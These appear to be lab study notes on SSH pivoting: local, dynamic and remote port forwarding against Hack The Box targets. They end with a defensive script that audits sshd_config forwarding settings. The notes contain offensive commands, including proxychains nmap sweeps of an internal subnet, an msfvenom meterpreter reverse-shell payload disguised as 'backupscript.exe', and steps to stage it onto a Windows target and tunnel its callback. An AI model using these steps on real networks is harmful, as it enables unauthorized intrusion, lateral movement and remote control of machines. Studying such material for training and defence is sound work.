Pivoting

Local Port Forwarding

Description

Enables us to simulate a remote service by sending traffic on a local port (33306) to a remote port (3306) over SSH.

Step 1

We cannot access the MySQL server on the Target Host.


    Shelled@htb[/htb]$ nmap -sT -p22,3306 10.129.202.64

    Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:12 EST
    Nmap scan report for 10.129.202.64
    Host is up (0.12s latency).
    
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3306/tcp closed mysql
    
    Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds

Step 2

To access the MySQL service, we can either SSH into the server and access MySQL from inside the Target Host, or we can port forward it to our localhost on port `33306` and access it locally.

    Shelled@htb[/htb]$ ssh -L 33306:localhost:3306 Target@10.129.202.64

The `-L` option tells the SSH client to request that the SSH server forward all the data we send to local port `33306` on to `localhost:3306` on the Target Host.

Dynamic Port Forwarding

Description

Enables us to simulate a remote host locally: the SSH client opens a SOCKS proxy on a local port (4444) and tunnels every connection sent to it to the remote network over SSH.

Step 0

We have RCE on the Target Host (10.10.15.6). This is the Target Host's network interface information:


    ubuntu@WEB01:~$ ifconfig 

    ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.10.202.64  netmask 255.255.0.0  broadcast 10.129.255.255
            inet6 dead:beef::250:56ff:feb9:52eb  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::250:56ff:feb9:52eb  prefixlen 64  scopeid 0x20<link>
            ether 00:50:56:b9:52:eb  txqueuelen 1000  (Ethernet)
            RX packets 35571  bytes 177919049 (177.9 MB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 10452  bytes 1474767 (1.4 MB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.16.5.129  netmask 255.255.254.0  broadcast 172.16.5.255
            inet6 fe80::250:56ff:feb9:a9aa  prefixlen 64  scopeid 0x20<link>
            ether 00:50:56:b9:a9:aa  txqueuelen 1000  (Ethernet)
            RX packets 8251  bytes 1125190 (1.1 MB)
            RX errors 0  dropped 40  overruns 0  frame 0
            TX packets 1538  bytes 123584 (123.5 KB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 270  bytes 22432 (22.4 KB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 270  bytes 22432 (22.4 KB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Step 1

We want to run an nmap scan against the network behind the Target Host's second interface (172.16.5.129). To do this we open an SSH session to the Target Host with dynamic port forwarding enabled, which starts a SOCKS proxy on local port 4444.

    Shelled@htb[/htb]$ ssh -D 4444 ubuntu@10.129.202.64

Step 2

To point proxychains at our SOCKS proxy instead of its default Tor port (9050), we must modify the proxychains configuration file located at `/etc/proxychains.conf`: add `socks4 127.0.0.1 4444` as the last line if it is not already there.


    Shelled@htb[/htb]$ tail -4 /etc/proxychains.conf

    # meanwile
    # defaults set to "tor"
    socks4 	127.0.0.1 4444

Step 3

    Shelled@htb[/htb]$ proxychains nmap -v -sn 172.16.5.1-200

    ProxyChains-3.1 (http://proxychains.sf.net)
    
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:30 EST
    Initiating Ping Scan at 12:30
    Scanning 10 hosts [2 ports/host]
    |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.2:80-<--timeout
    |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.5:80-<><>-OK
    |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.6:80-<--timeout
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    
    <SNIP>

Remote Port Forwarding

Description

Enables us to reach a host two layers deep, and let it reach us, by pairing a local port (4444) on the Attack Host with a listening port on the Pivot Host: traffic the Target Host sends to the Pivot Host is relayed over SSH to the Attack Host, and replies flow back the same way.

Step 1

Create a reverse shell payload that will be executed on the Target Host.

    Shelled@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8888

Step 2

Listen on the Attack Host for the reverse shell.

    msf6 > use exploit/multi/handler

Step 3

Transfer the payload from the Attack Host to the Pivot Host.

    Shelled@htb[/htb]$ scp backupscript.exe ubuntu@<ipAddressofTarget>:~/

Step 4

Transfer the payload from the Pivot Host to the Target Host (1): serve it over HTTP from the Pivot Host.

    ubuntu@Webserver$ python3 -m http.server 8123

Step 5

Transfer the payload from the Pivot Host to the Target Host (2): download it on the Target Host.

    PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Step 6

The Pivot Host will listen on port 8888 and forward all incoming connections to port 4444 on the Attack Host (`-N` opens the tunnel without running a remote command; `-v` prints verbose output).

    Shelled@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8888:0.0.0.0:4444 ubuntu@<ipAddressofTarget> -vN
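As an added defensive counterpart to the three tunnel types above (not part of the original notes): a POSIX sh checker that reads an sshd_config the way OpenSSH does (first value wins, Match blocks excluded) and reports whether AllowTcpForwarding and GatewayPorts on a server would permit these -L, -D and -R tunnels. The two sample configs are constructed and the function names are my own.

```shell
# Effective global value of an sshd_config keyword. OpenSSH keeps the FIRST
# value it reads for a keyword, and lines after the first "Match" apply only to
# matching connections, so parsing stops there. Accepts "Key value"/"Key=value".
sshd_effective() {   # usage: sshd_effective <config-file> <Keyword> <default>
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" -v def="$3" '
        /^[ \t]*(#|$)/ { next }             # skip comments and blank lines
        tolower($1) == "match" { exit }     # end of the global section
        { line = $0; gsub(/=/, " ", line); split(line, f)
          if (tolower(f[1]) == key) { print f[2]; found = 1; exit } }
        END { if (!found) print def }
    ' "$1"
}

# Check the two directives that gate the tunnels on this page: -L and -D need
# AllowTcpForwarding; an -R listener bound to a non-loopback address (the
# "<InternalIPofPivotHost>:8888" form above) also needs GatewayPorts.
# Findings go to stderr; stdout is a single OK or WEAK to branch on.
sshd_forwarding_check() {
    fwd=$(sshd_effective "$1" AllowTcpForwarding yes)  # OpenSSH default: yes
    gw=$(sshd_effective "$1" GatewayPorts no)          # OpenSSH default: no
    status=OK
    if [ "$fwd" != no ]; then
        echo "AllowTcpForwarding=$fwd: any SSH user can open -L/-D/-R tunnels" >&2
        status=WEAK
    fi
    if [ "$gw" != no ]; then
        echo "GatewayPorts=$gw: -R listeners may bind non-loopback addresses" >&2
        status=WEAK
    fi
    echo "$status"
}

# Constructed sample configs (not from the page). The first shows a common
# mistake: the "AllowTcpForwarding no" appended at the end is ignored because
# the earlier "yes" wins, and the Match block only restricts one user.
weak_conf=$(mktemp); hard_conf=$(mktemp)
cat > "$weak_conf" <<'EOF'
AllowTcpForwarding yes
GatewayPorts clientspecified
AllowTcpForwarding no
Match User ubuntu
    AllowTcpForwarding no
EOF
cat > "$hard_conf" <<'EOF'
AllowTcpForwarding no
GatewayPorts=no
EOF
sshd_forwarding_check "$weak_conf"   # prints WEAK
sshd_forwarding_check "$hard_conf"   # prints OK
```

On a live server, `sshd -T` prints the effective configuration authoritatively; this checker is for reviewing config files offline.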
